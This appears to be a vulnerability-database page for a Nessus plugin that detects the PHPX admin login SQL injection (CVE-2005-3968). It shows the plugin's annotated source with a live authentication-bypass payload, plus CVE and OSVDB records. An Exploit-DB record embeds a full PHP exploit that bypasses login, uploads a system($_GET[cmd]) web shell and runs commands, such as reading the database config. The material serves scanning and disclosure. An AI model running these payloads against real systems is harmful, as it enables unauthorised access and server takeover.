ID PHPX_USERNAME_SQL_INJECTION.NASL Type nessus Reporter This script is Copyright (C) 2005-2018 Tenable Network Security, Inc. Modified 2021-01-02T00:00:00
Description
The remote host is running PHPX, a content management system written
in PHP.
The installed version of PHPX does not validate input to the
'username' parameter of the 'admin/index.php' script before using it
in a database query. Provided PHP's 'magic_quotes_gpc' setting is
off, an attacker can leverage this issue to manipulate SQL queries to,
for example, bypass authentication and gain administrative access to
the affected application.
#
# (C) Tenable Network Security, Inc.
#
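#
# Plugin registration. The engine evaluates this branch once with
# `description` set; nothing below it runs in that pass. Keep script_id()
# first, script_end_attributes() after the last attribute, and the final
# exit(0) so the description pass never reaches the network check.
#
include("compat.inc");
if (description) {
  script_id(20251);
  script_version("1.23");
  script_cve_id("CVE-2005-3968");
  script_bugtraq_id(15680);
  script_name(english:"PHPX admin/index.php username Parameter SQL Injection");
  script_summary(english:"Checks for username parameter SQL injection vulnerability in PHPX");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server has a PHP application that is affected by a SQL
injection flaw." );
  script_set_attribute(attribute:"description", value:
"The remote host is running PHPX, a content management system written
in PHP.
The installed version of PHPX does not validate input to the
'username' parameter of the 'admin/index.php' script before using it
in a database query. Provided PHP's 'magic_quotes_gpc' setting is
off, an attacker can leverage this issue to manipulate SQL queries to,
for example, bypass authentication and gain administrative access to
the affected application." );
  script_set_attribute(attribute:"see_also", value:"https://exchange.xforce.ibmcloud.com/vulnerabilities/23459");
  # Public exploit (rgod, 2005-11-30) that chains this bypass into an
  # arbitrary-file upload and remote command execution.
  script_set_attribute(attribute:"see_also", value:"https://www.exploit-db.com/exploits/26697/");
  # Enabling magic_quotes_gpc only escapes the quote the payload relies on;
  # it is a global workaround, not a fix for the unparameterised query in
  # auth.inc.php. The OSVDB entry for this issue states that an upgrade is
  # required, so the solution leads with that.
  script_set_attribute(attribute:"solution", value:
"Upgrade to a version of PHPX that fixes this issue. As a temporary
workaround, enable PHP's 'magic_quotes_gpc' setting." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  # A working public exploit exists (EDB-ID 26697, linked above); the
  # previous value of "false" contradicted the E:H temporal vector as well.
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2005/12/02");
  script_set_attribute(attribute:"vuln_publication_date", value: "2005/11/30");
  script_cvs_date("Date: 2018/07/24 18:56:11");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:phpx:phpx");
  script_end_attributes();

  # ACT_ATTACK: this plugin sends a real authentication-bypass payload, so
  # it is skipped in safe-checks/non-intrusive scan policies.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
  script_copyright(english:"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.");

  # Needs a detected web server that can host PHP; honours the global
  # "disable CGI scanning" switch.
  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}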
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
# Pick the web port to test and bail out early if it cannot serve PHP.
port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);

# Candidate base directories: the CGI directories discovered so far, plus
# the default "/phpx" install path when thorough tests are enabled
# (list_uniq avoids probing the same path twice).
dirs = make_list(cgi_dirs());
if (thorough_tests) dirs = list_uniq(make_list("/phpx", dirs));
# Probe each candidate directory for the PHPX admin login form and, where
# it is present, attempt the authentication bypass described above.
foreach dir (dirs) {
  # Only fire on hosts that actually expose the PHPX admin login form;
  # a dead connection aborts the whole plugin rather than the directory.
  login_page = dir + "/admin/login.php";
  r = http_send_recv3(method:"GET", item:login_page, port:port);
  if (isnull(r)) exit(0);
  if ("form method=post action=index.php name=f" >!< r[2]) continue;

  # Login-bypass payload. The leading quote closes the username literal,
  # "or user_id=2" selects an existing account regardless of password, and
  # the trailing "--" is meant to comment out the rest of the query.
  # NOTE(review): the public exploit referenced on this page (EDB-ID 26697)
  # uses "/*" instead of "--"; in MySQL "--" only starts a comment when it
  # is followed by whitespace, so this variant may not fire on every
  # vulnerable install. The payload also assumes an account with user_id 2
  # exists - confirm against PHPX's schema.
  postdata = "username='or user_id=2--&" + "password=&" + "login=yes";
  r = http_send_recv3(method:"POST", item:dir + "/admin/index.php", port:port,
                      content_type:"application/x-www-form-urlencoded", data:postdata);
  if (isnull(r)) exit(0);

  # Search status line, headers and body together for the admin "Logout"
  # link that only a logged-in session gets.
  # NOTE(review): the public exploit treats a "Location: index.php" redirect
  # as success. If PHPX redirects after login, the logout link is only on
  # the next page and this check reports nothing - verify against a live
  # install before trusting a clean result.
  full_response = strcat(r[0], r[1], '\r\n', r[2]);
  if ("href=index.php?action=logout>Logout</a>" >< full_response) {
    security_hole(port);
    set_kb_item(name:'www/' + port + '/SQLInjection', value:TRUE);
    exit(0);
  }
}
{"id": "PHPX_USERNAME_SQL_INJECTION.NASL", "bulletinFamily": "scanner", "title": "PHPX admin/index.php username Parameter SQL Injection", "description": "The remote host is running PHPX, a content management system written\nin PHP. \n\nThe installed version of PHPX does not validate input to the\n'username' parameter of the 'admin/index.php' script before using it\nin a database query. Provided PHP's 'magic_quotes_gpc' setting is\noff, an attacker can leverage this issue to manipulate SQL queries to,\nfor example, bypass authentication and gain administrative access to\nthe affected application.", "published": "2005-12-02T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/20251", "reporter": "This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.", "references": ["https://exchange.xforce.ibmcloud.com/vulnerabilities/23459"], "cvelist": ["CVE-2005-3968"], "type": "nessus", "lastseen": "2021-01-01T04:55:01", "edition": 25, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-3968"]}, {"type": "osvdb", "idList": ["OSVDB:21384"]}, {"type": "exploitdb", "idList": ["EDB-ID:26697"]}], "modified": "2021-01-01T04:55:01", "rev": 2}, "score": {"value": 6.7, "vector": "NONE", "modified": "2021-01-01T04:55:01", "rev": 2}, "vulnersScore": 6.7}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description) {\n script_id(20251);\n script_version(\"1.23\");\n\n script_cve_id(\"CVE-2005-3968\");\n script_bugtraq_id(15680);\n\n script_name(english:\"PHPX admin/index.php username Parameter SQL Injection\");\n script_summary(english:\"Checks for username parameter SQL injection vulnerability in PHPX\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server has a PHP application that is affected by a SQL\ninjection flaw.\" );\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote host is running PHPX, a content management system written\nin PHP. \n\nThe installed version of PHPX does not validate input to the\n'username' parameter of the 'admin/index.php' script before using it\nin a database query. Provided PHP's 'magic_quotes_gpc' setting is\noff, an attacker can leverage this issue to manipulate SQL queries to,\nfor example, bypass authentication and gain administrative access to\nthe affected application.\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://exchange.xforce.ibmcloud.com/vulnerabilities/23459\");\n script_set_attribute(attribute:\"solution\", value:\n\"Enable PHP's 'magic_quotes_gpc' setting.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/12/02\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2005/11/30\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"remote\");\nscript_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpx:phpx\");\nscript_end_attributes();\n\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"http_version.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80, embedded: 0);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Loop through 
directories.\nif (thorough_tests) dirs = list_uniq(make_list(\"/phpx\", cgi_dirs()));\nelse dirs = make_list(cgi_dirs());\n\nforeach dir (dirs) {\n # Make sure the affected script exists.\n r = http_send_recv3(method:\"GET\", item:string(dir, \"/admin/login.php\"), port:port);\n if (isnull(r)) exit(0);\n res = r[2];\n\n # If it does...\n if (\"form method=post action=index.php name=f\" >< res) {\n # Try to exploit the flaw to bypass authentication.\n postdata = string(\n \"username='or user_id=2--&\",\n \"password=&\",\n \"login=yes\"\n );\n r = http_send_recv3(method: \"POST\", item: dir+\"/admin/index.php\", port: port, \n content_type:\"application/x-www-form-urlencoded\", data: postdata);\n if (isnull(r)) exit(0);\n res = strcat(r[0], r[1], '\\r\\n', r[2]);\n\n # There's a problem if we can log in.\n if (\"href=index.php?action=logout>Logout</a>\" >< res) {\n security_hole(port);\n set_kb_item(name: 'www/'+port+'/SQLInjection', value: TRUE);\n exit(0);\n }\n }\n}\n", "naslFamily": "CGI abuses", "pluginID": "20251", "cpe": ["cpe:/a:phpx:phpx"], "scheme": null}
{"cve": [{"lastseen": "2020-10-03T11:34:57", "description": "SQL injection vulnerability in auth.inc.php in PHPX 3.5.9 and earlier allows remote attackers to execute arbitrary SQL commands, bypass authentication, and upload arbitrary PHP code via the username parameter.", "edition": 3, "cvss3": {}, "published": "2005-12-03T19:03:00", "title": "CVE-2005-3968", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-3968"], "modified": "2018-10-19T15:39:00", "cpe": ["cpe:/a:phpx:phpx:3.5.4", "cpe:/a:phpx:phpx:3.5.2", "cpe:/a:phpx:phpx:3.5.3", "cpe:/a:phpx:phpx:3.5.1", "cpe:/a:phpx:phpx:3.5.7", "cpe:/a:phpx:phpx:3.5.6", "cpe:/a:phpx:phpx:3.5", "cpe:/a:phpx:phpx:3.5.9", "cpe:/a:phpx:phpx:3.5.8", "cpe:/a:phpx:phpx:3.5.5"], "id": "CVE-2005-3968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3968", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:phpx:phpx:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:phpx:phpx:3.5.4:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:18", "bulletinFamily": "software", "cvelist": ["CVE-2005-3968"], "edition": 1, "description": "## Vulnerability 
Description\nPHPX contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the admin login script calling auth.inc.php which does not properly sanitize user-supplied input to the 'username' field. This may allow an attacker to bypass the admin login check and inject or manipulate SQL queries in the backend database.\n## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.\n## Solution Description\nUpgrade to version 3.5.9 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nPHPX contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the admin login script calling auth.inc.php which does not properly sanitize user-supplied input to the 'username' field. This may allow an attacker to bypass the admin login check and inject or manipulate SQL queries in the backend database.\n## References:\nVendor URL: http://www.phpx.org/\nVendor Specific Solution URL: http://www.phpx.org/news.php?news_id=139\nSecurity Tracker: 1015300\n[Secunia Advisory ID:17858](https://secuniaresearch.flexerasoftware.com/advisories/17858/)\nOther Advisory URL: http://rgod.altervista.org/phpx_359_xpl.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-11/0384.html\nFrSIRT Advisory: ADV-2005-2696\n[CVE-2005-3968](https://vulners.com/cve/CVE-2005-3968)\nBugtraq ID: 15680\n", "modified": "2005-11-30T00:00:00", "published": "2005-11-30T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:21384", "id": "OSVDB:21384", "title": "PHPX auth.inc.php username Field SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-03T04:10:56", "description": "PHPX 3.5.x Admin Login.PHP SQL Injection Vulnerability. CVE-2005-3968. 
Webapps exploit for php platform", "published": "2005-11-30T00:00:00", "type": "exploitdb", "title": "PHPX 3.5.x Admin Login.PHP SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3968"], "modified": "2005-11-30T00:00:00", "id": "EDB-ID:26697", "href": "https://www.exploit-db.com/exploits/26697/", "sourceData": "source: http://www.securityfocus.com/bid/15680/info\r\n\r\nPHPX is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query.\r\n\r\nSuccessful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. \r\n\r\n<?php\r\n# 19.17 28/09/2005 18.15 30/11/2005 #\r\n# #\r\n# -- PhpX_359_xpl.php #\r\n# #\r\n# PhpX <=3.5.9 SQL injection->login bypass->remote commands xctn exploit #\r\n# by rgod #\r\n# site: http://rgod.altervista.org #\r\n# #\r\n# usage: launch this script from Apache, fill requested fields, then go... 
#\r\n# #\r\n# Sun-Tzu: \"The onrush of a conquering force is like the bursting of pent-up #\r\n# waters into a chasm a thousand fathoms deep\" #\r\n\r\nerror_reporting(0);\r\nini_set(\"max_execution_time\",0);\r\nini_set(\"default_socket_timeout\", 2);\r\nob_implicit_flush (1);\r\n\r\necho'<html><head><title>PhpX <=3.5.9 SQL injection/remote commands xctn exploit\r\n</title><meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\">\r\n<style type=\"text/css\"> body {background-color:#111111; SCROLLBAR-ARROW-COLOR:\r\n#ffffff; SCROLLBAR-BASE-COLOR: black; CURSOR: crosshair; color: #1CB081; } img\r\n{background-color: #FFFFFF !important} input {background-color: #303030\r\n!important} option { background-color: #303030 !important} textarea\r\n{background-color: #303030 !important} input {color: #1CB081 !important} option\r\n{color: #1CB081 !important} textarea {color: #1CB081 !important} checkbox\r\n{background-color: #303030 !important} select {font-weight: normal; color:\r\n#1CB081; background-color: #303030;} body {font-size: 8pt !important;\r\nbackground-color: #111111; body * {font-size: 8pt !important} h1 {font-size:\r\n0.8em !important} h2 {font-size: 0.8em !important} h3 {font-size: 0.8em\r\n!important} h4,h5,h6 {font-size: 0.8em !important} h1 font {font-size: 0.8em\r\n!important} \th2 font {font-size: 0.8em !important}h3 font {font-size: 0.8em\r\n!important} h4 font,h5 font,h6 font {font-size: 0.8em !important} * {font-style:\r\nnormal !important} *{text-decoration: none !important} a:link,a:active,a:visited\r\n{ text-decoration: none ; color : #99aa33; } a:hover{text-decoration: underline;\r\ncolor : #999933; } .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-size: 10px; } .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;\r\nfont-weight:bold; font-style: italic;}--></style></head><body><p class=\"Stile6\">\r\nPhpX <=3.5.9 SQL injection/remote commands xctn exploit </p><p class=\"Stile6\">a\r\nscript by rgod 
at <a href=\"http://rgod.altervista.org\"target=\"_blank\">\r\nhttp://rgod.altervista.org</a></p><table width=\"84%\"><tr><td width=\"43%\"> <form\r\nname=\"form1\" method=\"post\" action=\"'.strip_tags($SERVER[PHP_SELF]).'\"><p><input\r\ntype=\"text\" name=\"host\"> <span class=\"Stile5\">* hostname (ex:www.sitename.com)\r\n</span></p> <p><input type=\"text\" name=\"path\"> <span class=\"Stile5\">* path (ex:\r\n/phpx/ or just / ) </span></p><p><input type=\"text\" name=\"command\"> <span\r\nclass=\"Stile5\"> * specify a command \"cat ./../admin/includes/config.inc.php\" to\r\nsee database username & password (against Win: \"type .\\..\\admin\\includes\\config.\r\ninc.php\")</span> </p><p> <input type=\"text\" name=\"port\"> <span class=\"Stile5\">\r\nspecify a port other than 80 ( default value ) </span></p> <p> <input\r\ntype=\"text\" name=\"proxy\"><span class=\"Stile5\"> send exploit through an HTTP\r\nproxy (ip:port)</span></p><p><input type=\"submit\" name=\"Submit\" value=\"go!\"></p>\r\n</form> </td></tr></table></body></html>';\r\n\r\nfunction show($headeri)\r\n{\r\n$ii=0;\r\n$ji=0;\r\n$ki=0;\r\n$ci=0;\r\necho '<table border=\"0\"><tr>';\r\nwhile ($ii <= strlen($headeri)-1)\r\n{\r\n$datai=dechex(ord($headeri[$ii]));\r\nif ($ji==16) {\r\n $ji=0;\r\n $ci++;\r\n echo \"<td> </td>\";\r\n for ($li=0; $li<=15; $li++)\r\n { echo \"<td>\".$headeri[$li+$ki].\"</td>\";\r\n\t\t\t }\r\n $ki=$ki+16;\r\n echo \"</tr><tr>\";\r\n }\r\nif (strlen($datai)==1) {echo \"<td>0\".$datai.\"</td>\";} else\r\n{echo \"<td>\".$datai.\"</td> \";}\r\n$ii++;\r\n$ji++;\r\n}\r\nfor ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)\r\n { echo \"<td>  </td>\";\r\n }\r\n\r\nfor ($li=$ci*16; $li<=strlen($headeri); $li++)\r\n { echo \"<td>\".$headeri[$li].\"</td>\";\r\n\t\t\t }\r\necho \"</tr></table>\";\r\n}\r\n$proxy_regex = '(\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\:\\d{1,5}\\b)';\r\n\r\nfunction sendpacket() //if you have sockets module loaded, 2x speed! 
if not,load\r\n\t\t //next function to send packets\r\n{\r\n global $proxy, $host, $port, $packet, $html, $proxy_regex;\r\n $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\r\n if ($socket < 0) {\r\n echo \"socket_create() failed: reason: \" . socket_strerror($socket) . \"<br>\";\r\n }\r\n\t else\r\n \t\t { $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {echo 'Not a valid prozy...';\r\n die;\r\n }\r\n echo \"OK.<br>\";\r\n echo \"Attempting to connect to \".$host.\" on port \".$port.\"...<br>\";\r\n if ($proxy=='')\r\n\t\t {\r\n\t\t $result = socket_connect($socket, $host, $port);\r\n\t\t }\r\n\t\t else\r\n\t\t {\r\n\r\n\t\t $parts =explode(':',$proxy);\r\n echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';\r\n\t\t $result = socket_connect($socket, $parts[0],$parts[1]);\r\n\t\t }\r\n\t\t if ($result < 0) {\r\n echo \"socket_connect() failed.\\r\\nReason: (\".$result.\") \" . socket_strerror($result) . \"<br><br>\";\r\n }\r\n\t else\r\n\t\t {\r\n echo \"OK.<br><br>\";\r\n $html= '';\r\n socket_write($socket, $packet, strlen($packet));\r\n echo \"Reading response:<br>\";\r\n while ($out= socket_read($socket, 2048)) {$html.=$out;}\r\n echo nl2br(htmlentities($html));\r\n echo \"Closing socket...\";\r\n socket_close($socket);\r\n\r\n\t\t\t\t }\r\n }\r\n}\r\nfunction sendpacketii($packet)\r\n{\r\nglobal $proxy, $host, $port, $html, $proxy_regex;\r\nif ($proxy=='')\r\n {$ock=fsockopen(gethostbyname($host),$port);\r\n if (!$ock) { echo 'No response from '.htmlentities($host);\r\n\t\t\tdie; }\r\n }\r\n else\r\n {\r\n\t $c = preg_match($proxy_regex,$proxy);\r\n if (!$c) {echo 'Not a valid prozy...';\r\n die;\r\n }\r\n\t $parts=explode(':',$proxy);\r\n\t echo 'Connecting to '.$parts[0].':'.$parts[1].' 
proxy...<br>';\r\n\t $ock=fsockopen($parts[0],$parts[1]);\r\n\t if (!$ock) { echo 'No response from proxy...';\r\n\t\t\tdie;\r\n\t\t }\r\n\t }\r\nfputs($ock,$packet);\r\nif ($proxy=='')\r\n {\r\n\r\n $html='';\r\n while (!feof($ock))\r\n {\r\n $html.=fgets($ock);\r\n }\r\n }\r\nelse\r\n {\r\n $html='';\r\n while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))\r\n {\r\n $html.=fread($ock,1);\r\n }\r\n }\r\nfclose($ock);\r\necho nl2br(htmlentities($html));\r\n}\r\n\r\n\r\n$host=$_POST[host];$path=$_POST[path];\r\n$port=$_POST[port];$command=$_POST[command];\r\n$proxy=$_POST[proxy];\r\n\r\nif (($host<>'') and ($path<>'') and ($command<>''))\r\n{\r\n$port=intval(trim($port));\r\nif ($port=='') {$port=80;}\r\nif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}\r\nif ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}\r\n$host=str_replace(\"\\r\\n\",\"\",$host);\r\n$path=str_replace(\"\\r\\n\",\"\",$path);\r\n\r\n$SQL=\"'or user_id=2/*\";\r\n$SQL=urlencode($SQL);\r\n\r\n\r\n#STEP 1 -> Login Bypass...\r\n$data=\"username=\".$SQL.\"&password=&login=yes\";\r\n$packet=\"POST \".$p.\"admin/index.php HTTP/1.1\\r\\n\";\r\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\r\n$packet.=\"Referer: http://\".$host.\":\".$port.$path.\"admin/login.php?code=i\\r\\n\";\r\n$packet.=\"Accept-Language: en\\r\\n\";\r\n$packet.=\"Content-Type: application/x-www-form-urlencoded\\r\\n\";\r\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot/2.1 \\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Content-Length: \".strlen($data).\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Cache-Control: no-cache\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nshow($packet);\r\nsendpacketii($packet);\r\nif (eregi(\"Location: index.php\",$html)) {echo \"Exploit succeeded...<br>\";}\r\n else {die(\"Exploit 
failed...\");}\r\n$temp=explode(\"Set-Cookie: \",$html);\r\n$temp2=explode(' ',$temp[1]);\r\n$COOKIE=$temp2[0];\r\necho '<br>Your cookie: '.htmlentities($COOKIE);\r\n\r\n#STEP 2 -> Shell upload...\r\n$data='-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"confirm\"\r\n\r\n1\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"file1\"; filename=\"C:\\suntzu.php.menu\"\r\nContent-Type: text/plain\r\n\r\n<?php error_reporting(0);ini_set(\"max_execution_time\",0);system($_GET[cmd]);?>\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"file2\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"file3\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"file4\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"file5\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------7d5baf306c0\r\nContent-Disposition: form-data; name=\"more\"\r\n\r\n0\r\n-----------------------------7d5baf306c0--';\r\n\r\n$packet=\"POST \".$p.\"admin/images.php?action=create HTTP/1.1\\r\\n\";\r\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\r\n$packet.=\"Referer: http://\".$host.\":\".$port.$path.\"admin/images.php?action=create\\r\\n\";\r\n$packet.=\"Accept-Language: en\\r\\n\";\r\n$packet.=\"Content-Type: multipart/form-data; boundary=---------------------------7d5baf306c0\\r\\n\";\r\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\r\n$packet.=\"User-Agent: IncyWincy data gatherer\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Content-Length: 
\".strlen($data).\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Cache-Control: no-cache\\r\\n\";\r\n$packet.=\"Cookie: \".$COOKIE.\"\\r\\n\\r\\n\";\r\n$packet.=$data;\r\nshow($packet);\r\nsendpacketii($packet);\r\n\r\n#STEP 3 -> Retrieve filename from file list...\r\n$packet=\"GET \".$p.\"admin/images.php HTTP/1.1\\r\\n\";\r\n$packet.=\"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\\r\\n\";\r\n$packet.=\"Referer: http://\".$host.\":\".$port.$path.\"admin/images.php?action=create\\r\\n\";\r\n$packet.=\"Accept-Language: en\\r\\n\";\r\n$packet.=\"Accept-Encoding: text/plain\\r\\n\";\r\n$packet.=\"User-Agent: Jakarta Commons-HttpClient/3.0-rcx\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\";\r\n$packet.=\"Cache-Control: no-cache\\r\\n\";\r\n$packet.=\"Cookie: \".$COOKIE.\"\\r\\n\\r\\n\";\r\nshow($packet);\r\nsendpacketii($packet);\r\n$temp=explode('suntzu.php.menu',$html);\r\n$i=count($temp)-1;\r\n$temp2=explode(\"/files/\",$temp[$i-1]);\r\n$i=count($temp2)-1;\r\n$FILENAME=$temp2[$i].'suntzu.php.menu';\r\necho '<br>File has been renamed as: '.htmlentities($FILENAME);\r\n\r\n#STEP 4 -> Launch commands...\r\n$packet=\"GET \".$p.\"files/\".$FILENAME.\"?cmd=\".urlencode($command).\" HTTP/1.1\\r\\n\";\r\n$packet.=\"Host: \".$host.\"\\r\\n\";\r\n$packet.=\"User-Agent: Googlebot-Image/1.0 (+http://www.googlebot.com/bot.html)\\r\\n\";\r\n$packet.=\"Connection: Close\\r\\n\\r\\n\";\r\nshow($packet);\r\nsendpacketii($packet);\r\n}\r\nelse\r\n{echo \"Fill * required fields, optionally specify a proxy...\";}\r\n?>\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/26697/"}]}